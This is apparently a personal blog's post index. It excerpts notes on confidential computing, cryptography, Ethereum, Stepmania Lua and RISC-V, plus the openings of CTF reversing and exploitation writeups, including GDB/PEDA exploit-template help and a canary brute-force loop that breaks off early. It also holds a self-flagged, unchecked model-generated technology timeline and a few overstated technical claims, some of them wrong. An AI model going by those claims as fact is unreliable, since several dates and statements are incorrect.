not your average end user

Lean 4 vibe-port of Flypitch (continuum hypothesis independence)

Mon, 11 May 2026 23:45:19 -0800

I ported Flypitch from Lean 3 to Lean 4 over the course of approximately a week, mostly unattended Claude.

The proof of the independence of the continuum hypothesis is a Gödel + Cohen result that deals with the cardinality of the naturals vs. the reals.

That is to say, it states that ZFC (which is from…. set theory iirc) cannot prove or disprove the existence of a “size” of infinity between that of the Naturals and that of the Reals. The proof uses a technique called forcing (Cohen) and constructible sets (Gödel).

Confidential Computing Notes

Tue, 14 Apr 2026 00:00:00 +0100

Repo: ~/learning/gpucc (local)
Hardware: AMD EPYC (SEV-SNP), Intel Xeon (TDX), NVIDIA H100/A100

What is Confidential Computing?

Running workloads in hardware-enforced trusted execution environments (TEEs)
The host/hypervisor cannot read or tamper with guest memory
Attestation: cryptographic proof that the workload is running in a genuine TEE with expected code

AMD SEV-SNP

SEV = Secure Encrypted Virtualization
SNP = Secure Nested Paging (latest generation)
Each VM gets its own encryption key managed by a dedicated security processor (PSP)
Memory pages are encrypted transparently – the guest OS doesn’t need modification
Attestation via /dev/sev-guest ioctl:
- Send 64 bytes of user data (challenge/nonce)
- Get back a signed report (4096 bytes) from the AMD PSP
- Report contains measurement of the VM, policy, platform info

struct snp_report_req {
    uint8_t user_data[64];    // your challenge
    uint32_t vmpl;            // privilege level
    uint8_t report[4096];     // signed attestation report
};
// ioctl(fd, SNP_GET_REPORT, &req)

Kernel params needed: mem_encrypt=on iommu=pt amd_iommu=on kvm_amd.sev=1 kvm_amd.sev_snp=1
QEMU launch requires -object sev-snp-guest with cbitpos and policy

Intel TDX

TDX = Trust Domain Extensions
Similar concept to SEV-SNP but Intel’s approach
Uses a TDX Module running in a new CPU mode (SEAM)
Each TD (Trust Domain) has isolated memory, CPU state
Attestation via Intel’s SGX-style quoting infrastructure
Advice from colleague with PhD: Intel generally hires lots of PhDs who implement Everything but it’s overcomplicated; AMD stuff tends to be simpler / works

GPU Confidential Computing

NVIDIA H100 supports CC mode – GPU memory is encrypted
GPU gets its own attestation report (firmware measurement, nonce, signature)
Combined attestation: SEV-SNP report (VM integrity) + GPU report (GPU integrity)
VFIO passthrough to give the confidential VM direct GPU access:

# unbind from host driver, bind to vfio-pci
echo "$GPU_PCI_ID" > /sys/bus/pci/devices/$GPU_PCI_ID/driver/unbind
echo "vfio-pci" > /sys/bus/pci/devices/$GPU_PCI_ID/driver_override
echo "$GPU_PCI_ID" > /sys/bus/pci/drivers/vfio-pci/bind

The whole pipeline: host setup -> guest image -> launch VM with GPU passthrough -> run CUDA inside confidential VM

Attestation Flow

Verifier sends a nonce/challenge
Guest requests attestation from SEV-SNP (CPU-level) and GPU
Both return signed reports containing:
- Platform identity
- Firmware/code measurements
- The nonce (proves freshness)
Verifier checks signatures against known-good root of trust
If valid, verifier trusts the computation results

Workshop/Lab Ideas

TDX vs SEV-SNP comparison: setup, attestation, performance
GPU CC hello world: multiply two primes inside encrypted GPU memory, verify via attestation
Remote attestation demo: client sends challenge, CC VM responds with proof

Computer Science Notes

Wed, 01 Apr 2026 00:00:00 +0100

Book: Introduction to Algorithms – Cormen/Leiserson/Rivest/Stein (CLRS)
Book: Structure and Interpretation of Computer Programs – Abelson/Sussman (SICP)
Course: MIT 6.006 Introduction to Algorithms (YouTube) – Demaine
Course: MIT 6.824 Distributed Systems – Morris
Course: CMU 15-445 Database Systems – Pavlo
Exercises: Nand2Tetris
Exercises: Leetcode

golden section search - numerical approximation thing

Physics Notes

Tue, 31 Mar 2026 00:00:00 +0100

double slit
stern-gerlach
delayed choice
cosmic scale delayed choice (wheeler’s)

Why are passkeys better?

Wed, 25 Mar 2026 23:33:45 -0800

The login flows generally seem poorly-written, and we have now increased the complexity of login flows. Are they worth it?

Benefits:

They ?require? secure elements. Websites can now know that a subsequent request is coming from the same private key in a secure element (we have a cryptographic ?root of trust? / ?chain of attribution? that connects a given request to a previous one).
The are pub/privkey auth. Servers only store the pubkey, so can’t be hacked.
The are phishing-resistant (they check url bar exactly).

In short, they are hardware-computed credentials that are gated behind your Google/Apple/1password login.

List: Internet Pianists

Wed, 04 Mar 2026 19:28:07 -0800

Figured I should start keeping one:

Animenz - Anime arrangements
Cateen カティン -
lara6683 - videogame covers
Caliko - games

Cool blogs

Wed, 03 Sep 2025 17:10:40 -0200

Linear Algebra Notes

Wed, 03 Sep 2025 16:59:23 +0200

Hefferon: Linear Algebra (Textbook, 4th ed)

Prompting Tips

Tue, 02 Sep 2025 22:28:05 -0800

Reflect on 5-7 different possible sources of the problem, distill those down to 1-2 most likely sources, and then add logs to validate your assumptions before we move onto implementing the actual code fix
source

Title: Senior Engineer Task Execution Rule

Applies to: All Tasks

Rule: You are a senior engineer with deep experience building production-grade AI agents, automations, and workflow systems. Every task you execute must follow this procedure without exception:

Transformer Notes

Tue, 02 Sep 2025 17:12:42 -0800

Transformer visualizations:

https://bbycroft.net/llm
https://poloclub.github.io/transformer-explainer/
Autograd / miniGPT by hand (blog roadmap)
CS336 @ Stanford
Transformers from scratch - sensibly written, broken down by topic
Provable optimal transport with transformers - optimal transport - math for finding efficiently probability distribution 1 -> prob distrib 2
- Wasserstein distance - between two probability distribs
- Sinkhorn algorithm - iterative, converges towards a shortest
Transformers learn in-context from gradient descent (ETH Zurich)
- in-context learning - e.g. english followed by french, a “circuit” appears in the “neurons” called an “induction head”
- naively this might be, in the output, copying the english words - so the circuit is doing the copy, and then it passes the same tokenization of the english through the french neurons
- and this, but scaled up to another level of abstraction, is what is generally referred to as in-context learning (src)
- assertion of the ETH Zurich paper is that gradient descent happens in the forward pass
Unelicitable backdoors in Language Models via Cryptographic Transformer Circuits - feb2025, wrote a language to compile sha256 into a pytorch transformer, that only triggers when a particular input is present

Technology Timelines

Tue, 26 Aug 2025 19:31:20 -0800

Pulled from a model and not double-checked:

100,000-50,000bce spoken language
~10000bce agriculture, animal domestication
~65000bce la pasiega cave paintings
~3500bce bronze
~3300bce early swords
~3200bce written language
~3000bce wheel
~1500bce iron
~1500bce hinduism
~1300bce judaism
~600bce buddhism / confucianism / daoism
~500bce zoroastrianism in persia
~500bce democracy (athens)
~300bce shintoism
200bce -> 200ce roman engineering (aqueducts)
~30ce christianity
100ce paper
~600ce islam
~800ce arabic numerals / algebra
~1000 guns in china
1191 eisai brings Chan buddhism to Japan, from China
~1200 guns in europe
~1200 universities
~1440 printing press
~1450 telescope
~1600 microscope
1543 copernican heliocentric model
1687 newton principia mathematica
1752 electricity experiments (franklin)
1776 steam engine
1783 first powered steamboat (france)
1796 vaccination (jenner, smallpox)
1804 first steam locomotive
1807 fourier transform (fourier)
1821 electric motor (faraday)
1837 telegraph (morse)
1856 steel: bessemer process (affordable)
1876 telephone (bell)
1879 lightbulb (edison)
1885 first gasoline car, Karl Benz Patent-Motorwagen
1895 radio (marconi)
1895 x-rays (röntgen)
1903 first powered flight, wright brothers
1905 special relativity (einstein)
1908 mass-produced car (Ford model T)
1927 television
1928 penicillin (fleming)
1942 nuclear reactor (fermi)
1945 nuclear weapons
1945 eniac (computer)
1947 transistor (bell labs)
1953 dna (watson and crick)
1957 satellites (sputnik)
1958 integrated circuit
1969 moon landing
1969 ARPANET
1973 black-scholes model (black, scholes, merton)
1973 mobile phone (motorola)
~1971 gold standard -> fiat in USA due to Vietnam War
1978 IVF (first test-tube baby)
1983 TCP/IP internet
1990 web (tim berners lee @ cern) http and html
1995 GPS civilian access
2003 human genome sequenced (~92%)
2007 iPhone
2009 bitcoin
2012 CRISPR gene editing
2015 ethereum
2017 transformers
2018 alphafold
2020 gpt3
2020 mrna vaccines
2022 complete human genome (T2T)
2022 chatgpt
2022 jwst
2023 ozempic

Please let me know if there are any errors or obvious omissions.

LessOnline 2025

Sun, 01 Jun 2025 11:10:56 -0800

Rationalism has certainly been present in my high school and college friend groups: initially with HPMOR and then later with LessWrong posts in the DMs. When my roommates suggested we go to the conference, I was enthusiastic for a shared group activity.

“Being” very intellectual - in the head - is perhaps not a recipe for centeredness and embodiment, which seem essential for knowing what feels true in a moment, and where to go next.

Reading List 2024

Wed, 27 Nov 2024 12:21:22 -0800

https://gallium.inria.fr/blog/intel-skylake-bug/
- Skylake series of Intel processors had a hardware bug when using certain registers in tight loops, with hyperthreading enabled.
- Manifested as crashes in OCaml programs.

Some Stable Diffusion Research

Thu, 05 Sep 2024 00:25:54 -0800

I got curious how Stable Diffusion works.

Diffusion models, in short:

PNG -> Some “latest space”
Compressed with a “variational encoder / decoder”
Add noise according to a gaussian
Pass (prompt,noise,latent_img, timestep) into a U-Net
U-Net predicts noise that was added at that timestep
A scheduler/sampler (e.g. DDPM, Euler) subtract predicted noise
Pass through decoder

PNG -> Noise -> U-Net -> New PNG.

PNG -vaencoder> Latent image -gaussian_noise> latent+noise -unet> new_latent -vadecoder> New PNG

2024 Plans

Sat, 24 Feb 2024 19:15:36 -0800

Curious, once again, what voice to use where.

Wanting to know precisely the correct time, socially, for a drink, and precisely what the adverse health effects are.

Thanksgiving in Chicago November. Gym with Jose.

CCC at end of 2023.

SF for two weeks in January.

Colorado at the end of February, for Eric’s birthday.

Working in novel fields means getting good quick at learning the techniques of the specific field.

Properties of various blockchains

Mon, 19 Feb 2024 19:09:27 +0100

Bitcoin
- The First One
- Proof of Work
- Has a scripting language called Script
- Lightning
Ethereum
- Proof of Stake
- EVM opcodes see my notes
- zksync
- Optimism
Monero
- Privacy-preserving. High volume.
- Had some traceability issues early on (paper)
  - i.e., you could defeat the privacy guarantees
Zcash
- Privacy-preserving. Not as high volume.
- ZKPs.
Polkadot
- Focused on interoperability.
- “Substrate” SDK
  - hook into the base chain for computational “security” against 51% attacks.
- Kusama
Polygon
Solana
- EBPF bytecode
  - rust impl
Celestia
- Some sort of interesting data availability primitives?

Cryptography Notes

Wed, 24 Jan 2024 05:27:56 +0100

Book: Understanding Cryptography – Paar/Pelzi
Course: Introduction to Cryptography (YouTube) – Paar
Website: zkhack.dev - by Boneh?
Course: Cryptography 1 - Boneh
Exercises: Cryptopals
Course: Applied Cryptography tweet
Quantum computers break the hardness assumption of discrete log and factoring primes.
- RSA is broken.
- SHA256 has a sqrt() (quadratic) improvement - i.e. 256 -> 128.
Quantum computers are struggling with quantum error correction.
ElGamal encryption system (1985) [wiki][55555]
- (n.b. not ElGamal signature scheme)
- DHKE-based pubkey encryption scheme
- uses cyclic groups, typically integers modulo a prime
- relies on discrete log hardness
- multiplicatively homomorphic ( E(c1) * E(c2) = E(c1*c2) )
- not used in modern FHE though, no addition and grows fast
- key generation is exponentiation in the group, h = g^x
- encryption is,
  - map message -> group element, m
  - pick random integer y
  - s = h ^ y (shared secret s)
  - ciphertext is two parts; g^y and m * s
- c1, c2, m can be used to reconstruct s & y, so new one generated every message
decryption

Multisig vs Threshold Secret Sharing

Sun, 24 Dec 2023 16:26:54 +0100

threshold secret sharing:
- you have multiple shards of a secret
- given enough of them, you can reconstruct the whole secret
- sample implementation: github/hashicorp/vault/shamir.go
multisig:
- you need multiple transactions from valid parties to execute something
- sample implementation: solidity-by-example/multisig
- github/safe/safe-contracts/Safe.sol

threshold: interesting cryptographic construction for reconstructing a secret
multisig: pattern in smart contract programming for only executing something if enough signatures made by list of privkeys

There’s also group signatures – any member can generate a signature on behalf of a group. Identity of the signer cannot be determined without the group manager’s secret key.

Ethereum execution model

Mon, 18 Dec 2023 22:38:52 +0200

Execution model

source: https://www.evm.codes/about

stack based computer
all instructions take args from stack except PUSHx
sequential execution
- JUMP / JUMPI
- REVERT
execution context:
- data regions
- variables (program counter)
- current caller (sender)
- callee
code region:
- sort of immutable
  - SELFDESTRUCT / redeploy via CREATE2 can cause it to change between 2 transactions
- EOAs have empty
- CODESIZE / CODECOPY
- EXTCODESIZE / EXTCODECOPY for cross-contract
  - return zero for contracts under construction
  - indistinguishable from EOA, cannot trust detecting an EOA as an address on chain
stack:
- 32byte word size
- stores instruction inputs/outputs
- one created per call context
- destroyed at end of call context
- 1024 values max
- PUSH1, POP, DUP1, SWAP1
memory:
- not persistent / destroyed at end of call context
- initialized to 0
- MLOAD / MSTORE
- CREATE / EXTCODECOPY
storage:
- retained past completion of a call
- 32byte keys, 32byte values
- SLOAD / SSTORE
calldata:
- region
- sent to transaction as part of smart contract transaction
- immutable
- CALLDATALOAD / CALLDATASIZE / CALLDATACOPY
- xCALL
return data:
- RETURN / REVERT to set
- RETURNDATASIZE / RETURNDATACOPY
gas
- validators “vet” transactions before they’re added
- they get paid for this
- memory expansion - offset accesses can cause more cost, grows quadratic
access sets - list of storage slots
touch slot lists - storage slot keys accessed by contract addresses
gas refunds
- contracts w insufficient gas fail

Node types

source: eth docs – nodes and clients

ZKP Rust Libraries

Sun, 17 Dec 2023 21:16:26 +0200

Arkworks has pretty unergonomic API but is the most used.
- Example code to prove a merkle tree inclusion
Bellman looks a little nicer but a little less production-ready.
- exposes a bunch of low-level primitives (you have to implement a bit! and xor!) for example
- very mathy blog posts e.g. https://trapdoortech.medium.com/zkp-deep-into-bellman-library-9b1bf52cb1a6
- Looks quite clean to write – https://github.com/arcalinea/bellman-examples/blob/master/src/main.rs
  - needs random parameters?
  - and a verifying key?

VR Fishtank

Thu, 14 Dec 2023 00:25:50 +0200

In January 2022, I moved to Berlin and led a team of 5 to build:

A VR puzzle competition connected to a real-life fishtank via submersible webcam video stream designed to teach binary reverse engineering

Why did I build this?

I moved to Berlin in the dead of winter, decided I wanted to start a company, and naturally coped by spending 10-14h/day speaking Japanese instead of going outside. As one does!

bluesky

Tue, 02 May 2023 12:01:10 +0200

i’m excited about it!

https://staging.bsky.social/profile/klatz.co

why?

it solves a lot of twitter and mastodon’s problems. the devs are cool people. i’ve used twitter ~every day for eight years, and have many times not written useful code for myself because i knew it risked getting killed by twitter.

what’s cool about it?

domain name handles.

a collection of smart people who’ve thought for a long time about how to architect things shaped like twitter’s access pattern in a healthily decentralized way.

Git Notes

Fri, 24 Jun 2022 00:47:37 +0200

From contributing to Stepmania:

git pull --rebase upstream main
git push origin main

# delete local branch
git branch -d foo/bar
# delete remote branch
git push origin --delete foo/bar

# updating personal fork
git pull --rebase upstream main   # pull most recent changes from project.
                                  # --rebase avoids merge commit.
                                  # only drop in case of merge conflict.
                                  # requires setting upstream to stepmania and being on origin.


# submitting a PR
  create new branch
  commit changes to new branch
  push to remote (fork)
  click green "submit pull request"

the branch element is important - PR's are branch based, not snapshots. further commits on a branch that is PR'd will create problems - they'll be part of the same PR.
>> two simultaneous PR's will cause problems.

Protecting

Wed, 02 Feb 2022 12:55:39 +0100

… is hard, because it’s parenting.

And with parenting, you have to clean up after your kids, even when they make large messes, and you’re tired, and you’re at your wit’s end.

The impulse to protect can be dangerous when misdirected. Or even wielded by adversaries.

Think misapplications – those prepared to protect everything are bound to run out of resources. (Perhaps threat modeling / allocating resources under scarcity is useful here?)

What is security research?

Sun, 08 Aug 2021 12:54:35 +0100

(target audience: students)

Depends on context, but roughly sortable into 3 categories:

Independent (you, by yourself)
Industry (you, with a company)
Academic (you, with a professor)

These different sectors have different incentives. It is worth considering whether these incentives align with your goals. Once affiliated with an institution, it generally becomes easier to switch to similar classes/tiers of institutions.

I previously did undergraduate research with an academic lab that focused on systems security. Nowadays I do personal research into whatever topics I find interesting / think are most relevant for my career.

pwnies-please: Adversarially Attacking an Image Classifier

Tue, 03 Aug 2021 13:14:43 -0600

For UIUCTF 2021, I led a small group of colleagues to design and deploy a CTF challenge wherein competitors had to fool an image classifier based on resnet18.

The challenge asks you to upload an image to the “pwny bouncer”, who will then classify “pwny” or “not a pwny” using a naive classifier model, and a robust classifier model. To win the flag, you must submit 10 images that “fool” the nonrobust classifier (i.e. cause a mismatch between the classifiers).

radare2 install

Sat, 03 Oct 2020 15:24:07 -0800

git clone https://github.com/radareorg/radare2 && cd radare2 && sys/install.sh

how to use venv, simple

Fri, 02 Oct 2020 22:34:55 -0800

# tl;dr it lets you make a clean disposable python environment

# while in a project directory
python3 -m venv env

ls ./env/bin
# Activate.ps1  activate  activate.csh  activate.fish  easy_install easy_install-3.8  pip  pip3  pip3.8  pygmentize  python  python3

source ./env/bin/activate

# now we can install packages in this folder

which python3
# /home/ian/tmp/env/bin/python3
which pip3
# /home/ian/tmp/env/bin/pip3

pip install # whatever you need

Top N Most Valuable Metaskills for Technical People

Tue, 15 Sep 2020 03:10:25 -0800

(continuing the theme of “me writing posts for friends I’m teaching to code”)

How to ask technical questions artfully: https://www.google.com/search?q=how+to+ask+technical+questions
- Get faster, better, more accurate responses
- People like you for asking questions interestingly and respectfully
- Feel the fear, and do it anyway
How to read documentation
- Python docs are good for reference, but they do not often explain well
- Sites like Geeksforgeeks, w3c are good for finding examples of how to do a specific thing you want
How to submit good pull requests
- Be cheery and polite!
- https://github.com/ianklatzco/psky.app/issues/4

How to make a Discord Bot

Sun, 23 Aug 2020 23:41:08 -0700

Audience: friends I’m teaching to code.

Warning, these are likely to change as WSL and discord.py do.

If you get stuck anywhere or want to know more, DM me!

Goal

A Discord bot on your local computer that runs when your computer is on.

Prerequisites

Know how to read

You will learn

How to read long instructions, ignoring irrelevant info so you can find what you need quickly
How to use PowerShell, the Windows command line
How to use Bash, the Linux command line

Overview

(if Windows) install Windows Subsystem for Linux and upgrade it to version 2
Install Windows Terminal
Install Python and library discord.py
Make a new Discord Server and add me/the bot to it
Copy some quickstart code into a file and save it

Install WSL v2

Instructions adapted from these, I’ve pulled out the relevant parts as of August 2020.

RSI/Keyboard Overuse Resources

Thu, 02 Jul 2020 15:41:52 -0700

A friend recently developed tendonitis from typing/piano/Overwatch 12-14 hrs/day and I sent them my list of resources, collected over many years of me worrying about long-term effects of computer usage. Here they are.

“Voice Driven Development” - Talk by Emily Shea on fighting RSI using Talon, an OSS software project
g Heavy Industries: Stenography keyboards made by a person with strong friendly hacker energy (tweet)
Old xkcd blog post about a quick-to-learn one-hand mirrored keyboard layout
My collection of random wrist stretches posted to the internet
Company that sells Ergodox keyboards

WASM Reversing (b01lerctf 2020 alientech web 300)

Sun, 15 Mar 2020 20:44:14 -0700

Files

This challenge had 0 solves, probably because it was for a smaller CTF and had a difficult logical jump. I got about halfway through this challenge before getting stuck. I ended up asking the organizers for the intended solve after the competition ended, at which point I quickly solved it.

We’re given a WASM binary and a webserver asking for a username and password. This previous writeup was immensely helpful.

2019 Year in Review: Finishing School, SIGPwny, Japan

Thu, 06 Feb 2020 04:15:38 -0800

this post was started 6 February, finished 9 July, and is backdated

Been a while since the last post! I’ve been busy I guess. Haven’t had too much of an itch to blog until I got to Seattle and had ~~a little downtime~~ caffeine at 10pm by accident. Writing late at night remains one of my favorite hobbies.

I still really like the idea of blogging and hosting your own thing, because it’s a log of my life and I can share it with friends. I’d also like to refine my writing and decide on a tone for this particular blog, especially as I get interested in / develop expertise in my various subfields. For now, “this is my life and also random rhythm game information” seems good.

Writing a crappy DBI harness for ASISCTF 2019: Silkroad

Mon, 22 Apr 2019 03:57:15 -0600

I spent a disproportionately large amount of time solving the first portion of this binary, because I was having fun learning things via it. I did not solve anything past the first function, but hoo boy, there’s a great pleasure in diving really deeply into a small problem and learning a lot.

We are given a pwn binary that asks for a magic value and runs through six obfuscated constraints. It reads from stdin, stores the ASCII, strtols (str to long int) it, and strlens it.

CypherCon 4 Talk: Building a Cohesive Undergraduate Security Club

Thu, 11 Apr 2019 11:30:59 -0700

Ian Klatzco

tl;dr: How to make a successful security club

Create an easy-to-access chatroom (Discord)
Set up a CTF framework like CTFd
Make extremely easy challenges
Make slides, hand them out at the beginning
Present on them for 15m, walk around and help people solve for 45m

Abstract

Building good teams (either in the “elite” sense or the “healthy culture” sense) is hard. Our university security club had its ups and downs between boring meetings and inaccessibility to newcomers – we stepped it up this year with a tighter meeting format, approachable 24-7 internal CTF, and internal documentation. We saw better attendance, more people staying after meetings, and freshmen successfully completing projects with upperclassman mentorship. Other exciting developments include reusable published meetings and writing our own fuzzers.

GDB Catchpoints

Wed, 13 Mar 2019 20:12:22 -0500

gdb-peda$ help catch
Set catchpoints to catch events.

List of catch subcommands:

catch assert -- Catch failed Ada assertions
catch catch -- Catch an exception
catch exception -- Catch Ada exceptions
catch exec -- Catch calls to exec
catch fork -- Catch calls to fork
catch handlers -- Catch Ada exceptions
catch load -- Catch loads of shared libraries
catch rethrow -- Catch an exception
catch signal -- Catch signals by their names and/or numbers
catch syscall -- Catch system calls by their names
catch throw -- Catch an exception
catch unload -- Catch unloads of shared libraries
catch vfork -- Catch calls to vfork

Type "help catch" followed by catch subcommand name for full documentation.
Type "apropos word" to search for commands related to "word".
Command name abbreviations are allowed if unambiguous.
gdb-peda$

So, if you wanted to catch all syscalls, you can catch syscall. This will stop on the entrance and exit of each syscall. Divide by two, and you’ll get the total number of syscalls run by your program.

Compiling SM5 on Windows: 2019

Sat, 16 Feb 2019 22:18:30 -0600

Installed a bunch of dependencies from https://github.com/stepmania/stepmania/wiki/Compiling-StepMania.
- Dl’d directx
- had 2015 redistrib on system
- installed windows 10 sdk
- installed latest nsis (release 15 dec 2018)
installed visual studio community
git clone git@github.com:stepmania/stepmania.git
cd stepmania && git submodule update --init
Visual Studio > Open > CMake > stepmania/CMakeLists.txt
Commented out some lines of CMake
No argument specified with option /LIBPATH
Started installing etterna deps
Ultimately commented out this line
- Unsure why it solved the problem, but it successfully compiled so……

IO Functions

Wed, 30 Jan 2019 04:17:22 -0600

Manners of getting input. From memory, maybe more later.

x86, 32 & 64b.

read from stdin to a buffer: Will read any character (incl. nulls).

fgets: reads up to n-1. terminates on nulls. adds a newline.

scanf: varargs. takes a format string specifier, eg scanf("%9s", mem_loc);.

getc in a while() loop: probably my least favorite.

mmap()

port mapped io: x86 instructions in and out

mmio

UW printf chals: leakme

Fri, 18 Jan 2019 03:35:00 -0600

audience: sigpwny members after the meeting where we ran it. very tutorial-y

would probably be very useful for students trying to do CS461/ECE422’s printf activity, though that’s 32-bit

sigpwny meets 7pm thursday eceb 3013; we can’t help you with your security MPs but we’ll teach you the skills necessary to do them

This is very long and favors going in-depth so you can learn why we’re doing things rather than just giving you the solution. It probably could use some more editing. Pull requests are welcome.

peda.py reference

Fri, 18 Jan 2019 00:50:00 -0600

A few PEDA commands are undocumented (on the first page of the GitHub repo, there’s more useful help in help). Here are my notes.

There are a bunch of useful aliases at the bottom of the file.

stack n

Prints n words off the stack.

context

Type context to re-print what usually prints at a breakpoint (registers, code, stack).

Built-in exploit code

gdb-peda$ help skeleton
Generate python exploit code template
Usage:
    skeleton type [file]
        type = argv: local exploit via argument
        type = env: local exploit via crafted environment (including NULL byte)
        type = stdin: local exploit via stdin
        type = remote: remote exploit via TCP socket

Skip over certain functions (alarm)

gdb-peda$ help deactive
Bypass a function by ignoring its execution (eg sleep/alarm)
Usage:
    deactive function
    deactive function del (re-active)

CSAW2018: tablez

Thu, 17 Jan 2019 22:56:00 -0600

Warning: very stream-of-thought-y.

It’s PIE, and ASLR is already off on my machine which makes restarting in GDB easier.

Set a breakpoint on main, and the strncmp in main that looks useful.

main checks to make sure the input string is 37 bytes.

r <<< $(python -c "print 'a'*37")

x64 calling convention is rdi, rsi, rdx, rcx, r8, r9, and then they start going on the stack.

peda guesses the args on strncmp (and has one extra that shouldn’t be there):

x64 Argument Passing

Thu, 17 Jan 2019 22:56:00 -0600

According to the ABI, the first 6 integer or pointer arguments to a
function are passed in registers. The first is placed in rdi, the second in
rsi, the third in rdx, and then rcx, r8 and r9. Only the 7th argument and
onwards are passed on the stack.

via

RISC-V Opcodes and Register Names

Wed, 02 Jan 2019 21:49:00 -0900

I needed this a few times during ECE411 — Computer Organization and Design at UIUC.

Opcodes are stored in the lowest 6 bits of the instructions (for 32 bit mode at least)

LUI       0110111
AUIPC     0010111
JAL       1101111
JALR      1100111
BEQ       1100011
BNE       1100011
BLT       1100011
BGE       1100011
BLTU      1100011
BGEU      1100011
LB        0000011
LH        0000011
LW        0000011
LBU       0000011
LHU       0000011
SB        0100011
SH        0100011
SW        0100011
ADDI      0010011
SLTI      0010011
SLTIU     0010011
XORI      0010011
ORI       0010011
ANDI      0010011
SLLI      0010011
SRLI      0010011
SRAI      0010011
ADD       0110011
SUB       0110011
SLL       0110011
SLT       0110011
SLTU      0110011
XOR       0110011
SRL       0110011
SRA       0110011
OR        0110011
AND       0110011
FENCE     0001111
FENCE.I   0001111
ECALL     1110011
EBREAK    1110011
CSRRW     1110011
CSRRS     1110011
CSRRC     1110011
CSRRWI    1110011
CSRRSI    1110011
CSRRCI    1110011

pg. 104 (Chapter 19) of the RISC-V Spec, version 2.2 volume 1:

Register Names

pg. 109 (Chapter 20) of the RISC-V Spec, version 2.2 volume 1:
Contains an assembly programmer's manual (or at least, a placeholder for one)
which has some useful resources such as a mapping of pseudoinstructions to
base instructions.

Register : ABI Name : Description                       : Saver
x0       : zero     : Hard-wired zero                   : -
x1       : ra       : Return address                    : Caller
x2       : sp       : Stack pointer                     : Callee
x3       : gp       : Global pointer                    : -
x4       : tp       : Thread pointer                    : -
x5       : t0       : Temporary/alternate link register : Caller
x6–7     : t1–2     : Temporaries                       : Caller
x8       : s0/fp    : Saved register/frame pointer      : Callee
x9       : s1       : Saved register                    : Callee
x10–11   : a0–1     : Function arguments/return values  : Caller
x12–17   : a2–7     : Function arguments                : Caller
x18–27   : s2–11    : Saved registers                   : Callee
x28–31   : t3–6     : Temporaries                       : Caller

Python LC3 Emulator

Mon, 31 Dec 2018 10:40:00 -0900

I wanted to learn how to write a CPU emulator, because it seemed like fun! I ended up writing a disassembler too. GitHub.

I came across this “literate program” on how to write one in C++. I wanted to do it in Python, because it seemed like it would be more educational if I needed to transform the presented C++ into Python, and I was in the mood to learn more Python.

Digging into pwntools

Sun, 30 Dec 2018 14:40:00 -0900

I’m digging around into how pwntools is packaged. It looks really nicely organized and commented.

Get the path of a python modules

import pwn
print(pwn.__file__)

The pwn module is just a top-level with nice naming — pwnlib actually contains all the functionality.

dynelf.py is really interesting — it lets you resolve any symbol in a binary given a function leak(arbitrary_address).

How to learn about computers

Mon, 17 Dec 2018 09:45:00 -0500

I have this conversation with a lot of friends so I figured I’d collect my favorite resources somewhere so that I can just pass around a list. This is targeted at people who did not/do not intend to do a CS major in undergrad, and who are interested in learning more as a hobby or to get a job.

The hardest problem in computer science is learning how to enjoy it.

Quartus and ModelSim Tips & Tricks

Sun, 09 Dec 2018 22:43:00 -0500

Here are some things I learned during my time in ECE385 (FPGA Laboratory) and ECE411 (CPU Organization & Design) at UIUC.

You don’t have to re-build in Quartus if you made small changes.

You can just use the ModelSim command line (“Transcript”) and push up until you see do <PROJECT NAME>_run_msim_rtl_verilog.do. This will re-compile inside of ModelSim, saving you the need to close and reopen it.

Set the radix to hexadecimal

385 teaches you to do it through a GUI. The equivalent command (for ModelSim’s command window) is radix -h or ra h. You can try setting it to default to this, but I never got it working.

SM5 Lua: Error Reporting

Sat, 24 Nov 2018 07:57:00 -0500

I’m probably going to need a dance game sub-blog at this rate.

I really wish Stepmania didn’t crash (silently!) whenever it failed to find a file somewhere.

I’d love to write my own file loaders that didn’t fail on a missing file. Maybe simply shim everything to check if the file exists first?

TLDR:

SM(table) in Simply Love that pretty prints tables and whatever strings you want to print. It will write to crashinfo.txt, log.txt, and to the command line.
debug.debug() will cause the game to hang until you hit enter in the command line.
Warn and Trace seem not useful: they write to a text log in some random directory.
print is just Trace.
error will bail out of your actors/functions on error, and print at the top of the screen.

-- I think this is built-in Lua functionality.
-- The fallback theme init script makes some shortcuts for this.

-- https://github.com/stepmania/stepmania/blob/27fdfb38718474253aeb33e9f9c7fd1a91ed823a/Themes/_fallback/Scripts/00%20init.lua#L11

-- aka print/Trace as defined in _fallback
lua.Trace('string') -- Writes 'timestap: string' to log.txt.

-- It looks like crashinfo.txt's partial log is the last few things that
-- were supposed to be written to log.txt, before they were written.

error('reason') -- Bails on the current actor. Will prevent it from loading
-- any further (basically exits out of it) and displays the error at the top
-- of the Stepmania screen (if error reporting enabled).

lua.Warn('String') -- aka Warn
-- Prints the following to log.txt:
-- /////////////////////////////////////////
-- 02:14.132: WARNING: String
-- /////////////////////////////////////////

Logs -> ~/Library/Logs/PRODUCT_ID

radare2 basics

Fri, 16 Nov 2018 15:01:53 -0500

(I wrote this post for our underclassmen, because I kept needing to explain how to get to graph mode in r2 and didn’t want to keep repeating myself).

Radare2 is a vim-like reverse engineering tool. It is free. Your other options are Binary Ninja and IDA, which cost money for anything other than 32 bit binaries. They are substantially easier to learn and use.

Here I’ll walk through an alternative way to solve how2re from the one we went over during the meeting.

boilerctf: old-oaken-bucket

Mon, 05 Nov 2018 00:02:00 -0500

PEDA may be useful

It’s a script that makes gdb easier to use (run these in your shell)

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

Some GDB basics you’ll need

gdb old-oaken-bucket
break * 0x4005f6 set a breakpoint on the main function. the binary is stripped, if you’re curious why read this
run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA # starts the program and runs until it hits the breakpoint
ni # next instruction – steps in assembly.
c continue until the next breakpoint or the program ends

Simple reversing challenge from an internal Purdue ctf that i *ahem*’d my way into. Download link.

Adventures in SM5 Lua

Mon, 29 Oct 2018 03:49:00 -0500

Mostly just trying to write down primitives that I figure out so I can reference them later / share them with others.

Actor is the basic unit of a stepmania script.

You can only return one per Lua file, so you will usually put a bunch of Actors in an “ActorFrame”.

Everytime you change the .ssc, you need to reload cache. Lua scripts are read when you play the simfile, so you only need to start the song in the SM5 editor to see changes.

picoctf 2018 writeups

Thu, 18 Oct 2018 00:42:00 -0500

buffer_overflow_3

Binary with a handrolled, static canary. So, we’re leaking it byte-by-byte.

from pwn import *
import sys

for c in range(0,256):
